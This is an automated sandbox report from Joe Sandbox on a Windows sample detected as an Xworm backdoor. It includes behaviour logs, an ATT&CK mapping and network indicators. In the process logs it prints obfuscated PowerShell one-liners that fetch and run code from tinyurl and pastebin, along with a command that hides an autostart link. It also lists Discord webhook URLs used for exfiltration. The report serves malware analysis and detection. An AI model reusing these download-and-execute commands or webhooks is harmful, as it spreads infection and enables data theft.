Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Users\user\Desktop\vF20HtY4a4.exeMemory allocated: 1FD063A0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeMemory allocated: 1FD1E490000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3374Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6481Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1588Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4372Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5411Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1263
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 431
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3926
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5815
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2044Thread sleep time: -15679732462653109s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6468Thread sleep count: 1588 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4052Thread sleep count: 209 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6964Thread sleep count: 151 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6720Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5064Thread sleep count: 4372 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6888Thread sleep count: 5411 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3064Thread sleep time: -23058430092136925s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6976Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6552Thread sleep count: 1263 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5164Thread sleep count: 191 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6040Thread sleep count: 431 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7096Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6336Thread sleep count: 3926 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5976Thread sleep count: 5815 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5080Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1656Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 0000000E.00000002.2119610367.00000210EA8FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
Source: powershell.exe, 00000009.00000002.2015256142.000001FD296FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\vF20HtY4a4.exeQueries volume information: C:\Users\user\Desktop\vF20HtY4a4.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Spearphishing Link		111
Windows Management Instrumentation		11
Registry Run Keys / Startup Folder		11
Process Injection		1
Masquerading		OS Credential Dumping111
Security Software Discovery		Remote Services1
Archive Collected Data		1
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
PowerShell		1
DLL Side-Loading		11
Registry Run Keys / Startup Folder		1
Disable or Modify Tools		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		141
Virtualization/Sandbox Evasion		Security Account Manager141
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture4
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets1
File and Directory Discovery		SSHKeylogging15
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Timestomp		Cached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1534114 Sample: vF20HtY4a4.exe Startdate: 15/10/2024 Architecture: WINDOWS Score: 92 41 pastebin.com 2->41 43 tinyurl.com 2->43 45 2 other IPs or domains 2->45 63 Suricata IDS alerts for network traffic 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 Multi AV Scanner detection for submitted file 2->67 71 2 other signatures 2->71 8 vF20HtY4a4.exe 2 2->8         started        11 forfiles.exe 1 2->11         started        13 forfiles.exe 1 2->13         started        signatures3 69 Connects to a pastebin service (likely for C&C) 41->69 process4 signatures5 73 Suspicious powershell command line found 8->73 15 powershell.exe 15 20 8->15         started        20 conhost.exe 8->20         started        22 powershell.exe 7 11->22         started        24 conhost.exe 1 11->24         started        26 powershell.exe 13->26         started        28 conhost.exe 1 13->28         started        process6 dnsIp7 49 raw.githubusercontent.com 185.199.110.133, 443, 49705, 49711 FASTLYUS Netherlands 15->49 51 tinyurl.com 104.18.111.161, 49704, 80 CLOUDFLARENETUS United States 15->51 53 discord.com 162.159.136.232, 443, 49713, 49718 CLOUDFLARENETUS United States 15->53 39 C:\ProgramData\...\BeginSync.lnk, MS 15->39 dropped 55 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 15->55 57 Suspicious powershell command line found 15->57 59 Tries to open files direct via NTFS file id 15->59 61 Powershell creates an autostart link 15->61 30 conhost.exe 15->30         started        32 attrib.exe 1 15->32         started        34 powershell.exe 13 22->34         started        37 powershell.exe 26->37         started        file8 signatures9 process10 dnsIp11 47 pastebin.com 104.20.4.235, 443, 49709, 49710 CLOUDFLARENETUS United States 34->47

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
vF20HtY4a4.exe34%ReversingLabsWin64.Backdoor.Xworm

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://go.micro0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
tinyurl.com
104.18.111.161
truetrue
    		unknown
    discord.com
    		162.159.136.232
    		truetrue
      		unknown
      raw.githubusercontent.com
      		185.199.110.133
      		truetrue
        		unknown
        pastebin.com
        		104.20.4.235
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
            		unknown
            https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
              		unknown
              https://discord.com/api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSItrue
                		unknown
                https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_crypter.txtfalse
                  		unknown
                  http://pastebin.com/raw/sA04Mwk2false
                    		unknown
                    https://pastebin.com/raw/sA04Mwk2false
                      		unknown
                      https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2true
                        		unknown
                        http://tinyurl.com/bdhpvpnyfalse
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://discord.compowershell.exe, 00000009.00000002.2001538441.000001FD12896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.00000210814AA000.00000004.00000800.00020000.00000000.sdmptrue
                            		unknown
                            https://discord.com/api/webhooks/128545359042878powershell.exe, 00000009.00000002.2001538441.000001FD12896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.00000210814AA000.00000004.00000800.00020000.00000000.sdmptrue
                              		unknown
                              https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_powershell.exe, 0000000E.00000002.2082988609.0000021080BA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080A92000.00000004.00000800.00020000.00000000.sdmptrue
                                		unknown
                                https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQpowershell.exe, 00000009.00000002.2001538441.000001FD11F57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080BA5000.00000004.00000800.00020000.00000000.sdmptrue
                                  		unknown
                                  https://raw.githubusercontent.compowershell.exe, 00000009.00000002.2001538441.000001FD11EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080AF3000.00000004.00000800.00020000.00000000.sdmptrue
                                    		unknown
                                    https://go.micropowershell.exe, 00000009.00000002.2001538441.000001FD118D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080508000.00000004.00000800.00020000.00000000.sdmptrue
                                    • URL Reputation: safe
                                    		unknown
                                    http://raw.githubusercontent.compowershell.exe, 00000009.00000002.2001538441.000001FD11EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080AF3000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://discord.compowershell.exe, 00000009.00000002.2001538441.000001FD12896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.00000210814AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://aka.ms/pscore68powershell.exe, 00000009.00000002.2001538441.000001FD1141B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2001538441.000001FD11430000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.000002108005E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080025000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000009.00000002.2001538441.000001FD11457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080085000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://pastebin.compowershell.exe, 00000009.00000002.2001538441.000001FD11E26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2001538441.000001FD118D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2001538441.000001FD11E42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080A74000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://pastebin.compowershell.exe, 00000009.00000002.2001538441.000001FD11E32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080A64000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            162.159.136.232
                                            		discord.comUnited States
                                            		13335CLOUDFLARENETUStrue
                                            104.20.4.235
                                            		pastebin.comUnited States
                                            		13335CLOUDFLARENETUStrue
                                            104.18.111.161
                                            		tinyurl.comUnited States
                                            		13335CLOUDFLARENETUStrue
                                            185.199.110.133
                                            		raw.githubusercontent.comNetherlands
                                            		54113FASTLYUStrue

                                            General Information

                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1534114
                                            Start date and time:2024-10-15 16:06:56 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 5m 27s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:18
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:vF20HtY4a4.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:f06b0c9ae4553b0558c06ecfcb657a9f1d5a42da37caec81ae4a91dd5d03b332.exe
                                            Detection:MAL
                                            Classification:mal92.troj.evad.winEXE@19/14@4/4
                                            EGA Information:
                                            • Successful, ratio: 50%
                                            HCA Information:
                                            • Successful, ratio: 71%
                                            • Number of executed functions: 7
                                            • Number of non-executed functions: 1
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe

                                            Warnings

                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
